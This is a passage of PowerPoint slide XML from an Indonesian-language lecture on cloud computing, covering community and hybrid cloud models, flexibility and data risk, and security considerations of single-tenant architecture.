              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komunitas-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang di-host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standardisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hibrida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>swasta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/in-host/di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjalanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjualan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hampir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepanjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperkirakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262540896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Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memutuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penyewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
